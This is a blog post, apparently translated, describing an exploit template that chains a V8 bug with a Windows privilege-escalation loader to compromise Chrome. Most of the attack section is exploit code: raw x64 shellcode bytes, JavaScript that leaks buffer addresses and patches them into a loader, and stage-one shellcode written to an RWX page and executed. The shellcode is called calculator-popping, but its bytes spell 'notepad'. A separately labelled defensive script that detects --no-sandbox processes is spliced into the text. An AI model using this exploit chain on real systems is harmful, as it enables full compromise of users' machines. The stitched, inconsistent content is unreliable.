Learning V8 Exploitation from Scratch: The Full Windows Chrome Exploitation Chain

This article records how a V8 vulnerability is actually exploited on Windows.

V8 is only the engine Chrome uses to parse JavaScript. Even if a V8 bug lets you execute shellcode, you still cannot obtain system privileges, because outside the V8 engine there is another layer, the sandbox. That is why the final demo in V8 exploitation write-ups always requires launching Chrome with the --no-sandbox flag, and why the realistic targets for a V8 bug on its own are applications that embed the Chrome engine without enabling the sandbox.

Beyond that, a V8 bug has to be combined with other vulnerabilities, such as a sandbox escape or a privilege escalation bug, before Chrome is truly compromised end to end.

This article describes how, in a Windows environment, to write an exploit that combines a V8 bug with a Windows privilege escalation bug to compromise Chrome end to end.
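Because the whole chain above only works when the sandbox is off, the defender-side check below flags processes that were launched with a sandbox-disabling switch. This is an added example, not code from the original post: the CSV rows are constructed, and the live collector assumes a Windows host where PowerShell's Get-CimInstance Win32_Process is available.

```python
import csv
import io
import re
import subprocess
from typing import Dict, List

# Switches that disable or weaken the Chromium process sandbox. --no-sandbox is
# the one the post relies on; --disable-gpu-sandbox is a related Chromium switch.
# Both are matched as whole tokens, so "--no-sandbox-foo" does not count.
RISKY_SWITCHES = ("--no-sandbox", "--disable-gpu-sandbox")
_SWITCH_RE = re.compile(
    r"(?<!\S)(" + "|".join(re.escape(s) for s in RISKY_SWITCHES) + r")(?!\S)")

# Constructed sample, in the shape produced by:
#   Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine | ConvertTo-Csv -NoTypeInformation
SAMPLE_CSV = '''"ProcessId","Name","CommandLine"
"4120","chrome.exe","""C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"" --profile-directory=Default"
"4188","chrome.exe","""C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"" --type=renderer --no-sandbox --lang=en-US"
"5020","kiosk-app.exe","""C:\\Apps\\kiosk-app.exe"" --no-sandbox --disable-gpu-sandbox"
"5300","notepad.exe","""C:\\Windows\\System32\\notepad.exe"" --no-sandbox-is-not-a-flag"
'''


def find_unsandboxed(csv_text: str) -> List[Dict[str, object]]:
    """Return processes whose command line carries a sandbox-disabling switch."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("CommandLine") or ""  # empty for processes we cannot query
        found = sorted(set(_SWITCH_RE.findall(cmd)))
        if found:
            hits.append({"pid": int(row["ProcessId"]), "name": row["Name"],
                         "switches": found})
    return hits


def collect_win32_processes() -> str:
    """Live collection on a Windows host: dump Win32_Process as CSV via PowerShell."""
    ps = ("Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine"
          " | ConvertTo-Csv -NoTypeInformation")
    return subprocess.run(["powershell", "-NoProfile", "-Command", ps],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Replace SAMPLE_CSV with collect_win32_processes() to scan a live host.
    for hit in find_unsandboxed(SAMPLE_CSV):
        print(f"[!] pid {hit['pid']} {hit['name']}: {' '.join(hit['switches'])}")
```

Embedded-Chromium applications (kiosk or desktop apps) use arbitrary executable names, so the check keys on the switch rather than on chrome.exe.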

1. The shellcode you actually want to execute:

```js
// shellcode.js
let usershellcode=[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x8d,0x8d,0x1,0x1,0x0,0x0,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5,0x6e,0x6f,0x74,0x65,0x70,0x61,0x64,0x0,0x0];
```

Store a calculator-popping shellcode in a variable and save it in shellcode.js.

2. Find a Windows expert to write a Windows privilege-escalation "loadpe" (this part will be written later by my colleague) and put the escalation into loadpe; the loadpe binary is then written into dll.js:

```js
// dll.js
let dll=[......];
```

Once this loadpe has completed the Windows privilege escalation, it executes the shellcode from shellcode.js, so the exploit has to leak the shellcode's address:

```js
// addressOf, read64, hex, ftoi and ftob are the exploit primitives built in the
// earlier posts of this series; they are not defined here.
var myshell = new Uint8Array(0x1000);
for (let i = 0x0; i < usershellcode.length; i++) {
    myshell[i] = usershellcode[i];
}
// Leak the address of the Uint8Array object, then read the 64-bit value at
// offset 0x28 of the object (the backing-store pointer in the targeted build),
// which is the address of the shellcode bytes.
var shellDataAddr = addressOf(myshell);
console.log("[*] leak shellcode data addr: 0x" + hex(shellDataAddr));
var shellAddr = read64(shellDataAddr + 0x28n);
alert("[*] leak my shellcode addr: 0x" + hex(ftoi(shellAddr)));
// Convert the leaked address to its 8 little-endian bytes and patch them into
// the loadpe image at the offset where loadpe expects the shellcode address.
var bshellAddr = ftob(shellAddr);
var addr_offset = ???; // offset inside loadpe; left unspecified in the post
let dllData = new Uint8Array(dll.length);
for (let i = 0x0; i < dll.length; i++) {
    if (i >= addr_offset && i < addr_offset + 8) {
        dllData[i] = bshellAddr[i - addr_offset];
    } else {
        dllData[i] = dll[i];
    }
}
```
3. We also need to leak the address of the dll buffer; the exploit's own shellcode then marks the loadpe memory readable, writable and executable and jumps to it:
```js
// Same leak as for the shellcode: object address, then its backing-store pointer.
var dllDataAddr = addressOf(dllData);
console.log("[*] leak dll data addr: 0x" + hex(dllDataAddr));
var dllAddr = read64(dllDataAddr + 0x28n);
alert("[*] leak dll addr: 0x" + hex(ftoi(dllAddr)));
// Stage-one shellcode: makes the loadpe buffer RWX and jumps to it (bytes elided in the post).
var shellcode = [......];
var bdllAddr = ftob(dllAddr);
var Offset = ???; // start of the second address slot in the stage-one shellcode; left unspecified in the post
// Patch the leaked dll address into both 8-byte immediate slots (at byte 2 and at Offset + 2).
for (let i = 0x0; i < 0x8; i++) {
    shellcode[0x2 + i] = bdllAddr[i];
    shellcode[Offset + 0x2 + i] = bdllAddr[i];
}
// A BigUint64Array view needs a byte length that is a multiple of 8, so round up (zero padding).
var Uint8Shellcode = new Uint8Array(Math.ceil(shellcode.length / 8) * 8);
var Uint64Shellcode = new BigUint64Array(Uint8Shellcode.buffer);
for (let i = 0x0; i < shellcode.length; i++) {
    Uint8Shellcode[i] = shellcode[i];
}
// copy_shellcode_to_rwx, rwx_page_addr and f() come from the earlier posts:
// write the stage-one shellcode into the RWX page and call into it.
copy_shellcode_to_rwx(Uint64Shellcode, rwx_page_addr);
f();
```

Writing the exploit from this template lets it plug straight into the loadpe privilege-escalation exploit written by the Windows expert: I research V8 bugs, he researches Windows bugs, and our results can be combined.

https://nobb.site/2022/02/23/0x74/

Author: Hcamael

Posted on: 2022-02-23

Updated on: 2022-03-17